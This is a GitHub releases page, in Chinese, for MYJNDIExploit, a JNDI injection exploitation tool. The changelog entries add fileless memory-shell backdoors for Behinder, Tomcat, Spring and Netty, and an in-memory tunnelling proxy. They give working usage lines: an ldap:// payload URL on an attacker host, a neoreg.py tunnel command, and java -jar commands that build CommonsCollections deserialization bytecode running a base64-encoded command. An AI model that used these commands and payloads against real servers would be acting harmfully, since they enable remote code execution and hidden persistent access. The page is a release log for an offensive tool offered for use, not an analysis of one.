Skip to content

Releases: achuna33/MYJNDIExploit

1.4.2

30 Aug 15:55
Compare
Choose a tag to compare

1.修改为冰蝎高版本内存马
2.添加内存tunnel 正向代理
使用:python neoreg.py -k filter -H "auth: fuck" -u "http://192.168.186.128:8080/"
image

使用例子:ldap://192.168.186.128:1389/Basic/filetertunnel 反序列化方式也和以前格式一样
生成字节码: -o 参数 java -jar MYJNDIExploit.jar -o /Deserialization/CommonsCollectionsK2/filetertunnel

V1.4.1

28 Jun 10:30
Compare
Choose a tag to compare
  1. 修复 打 tomcat 内存时目标不存在tomcat-embed-core.jar 导致webappClassLoaderBase.getResources(); 返回null 得问题
  2. 逐渐很难再忍受这么大的体积了,后面可能会删掉一些利用频率不高的jar 包

1.3

27 May 07:49
Compare
Choose a tag to compare
1.3

[修复TomcatMemshell1,在Spring 环境下报错

image

image

MYJNDIExploit1.2

12 May 10:12
Compare
Choose a tag to compare

可以像ysoserial 一样将生成的class 输出到文件
使用方法:java -jar MYJNDIExploit.jar -o /Deserialization/CommonsCollectionsK2/Command/Base64/d2hvYW1p
优点:可以自己构建class 参与到cc链中
image

使用生成得文件进行反序列化
image

MYJNDIExploit1.1

05 May 07:05
Compare
Choose a tag to compare

新增 适配高版本Spring 内存马 使用方式 /Basic/SpringMemshell2

1651819124(1)

新增 适配高版本Netty内存马 使用方式 /Basic/nettymeshell

1651819155